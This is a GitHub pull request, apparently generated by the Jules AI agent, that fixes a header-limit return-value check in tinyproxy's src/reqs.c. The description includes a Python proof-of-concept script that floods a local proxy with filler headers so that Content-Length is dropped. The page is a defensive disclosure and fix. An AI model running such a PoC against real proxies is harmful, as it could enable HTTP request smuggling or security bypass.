Fix Header Dropping Vulnerability in reqs.c by sam-rendell · Pull Request #1 · sam-rendell/tinyproxy · GitHub
Skip to content

Fix Header Dropping Vulnerability in reqs.c#1

Open
sam-rendell wants to merge 1 commit into
masterfrom
fix-header-dropping-vulnerability-8764017303393033696
Open

Fix Header Dropping Vulnerability in reqs.c#1
sam-rendell wants to merge 1 commit into
masterfrom
fix-header-dropping-vulnerability-8764017303393033696

Conversation

@sam-rendell

@sam-rendell sam-rendell commented Feb 6, 2026

Copy link
Copy Markdown
Owner

Identify and fix a header dropping vulnerability in src/reqs.c caused by incorrect return value checking of add_header_to_connection. The function pseudomap_append returns 0 when the header limit (256) is reached, but src/reqs.c only checked for < 0. This allowed headers beyond the limit (e.g., Content-Length) to be silently dropped, potentially enabling HTTP Request Smuggling or Security Bypass.

The fix changes the check to <= 0 to correctly handle the failure case.

Vulnerability Details:

  • Severity: High
  • Description: Header Dropping leading to potential Request Smuggling.
  • Vulnerable Path: src/reqs.c:get_all_headers -> add_header_to_connection -> pseudomap_append
  • PoC:
import socket

def attack():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('127.0.0.1', 8888))

    # Request to upstream
    req = "POST http://127.0.0.1:9999/ HTTP/1.1\r\n"
    req += "Host: 127.0.0.1:9999\r\n"
    
    # Send filler headers to reach limit (256)
    for i in range(255):
        req += f"H-{i}: v\r\n"
    
    # Next header is dropped
    req += "Content-Length: 5\r\n"
    req += "\r\n"
    req += "BODY1"
    
    s.sendall(req.encode())
    resp = s.recv(4096)
    print("Response:", resp)
    s.close()

if __name__ == "__main__":
    attack()
  • Mitigation: Change error check to if (... <= 0) in src/reqs.c.

PR created automatically by Jules for task 8764017303393033696 started by @sam-rendell

@google-labs-jules @sam-rendell
Fix Header Dropping Vulnerability in reqs.c caused by incorrect error…
44eb959 
… check

Co-authored-by: sam-rendell <73448031+sam-rendell@users.noreply.github.com>
@google-labs-jules

google-labs-jules Bot commented Feb 6, 2026

Copy link
Copy Markdown

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

No reviews

Assignees

No one assigned

Labels

None yet

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

1 participant

@sam-rendell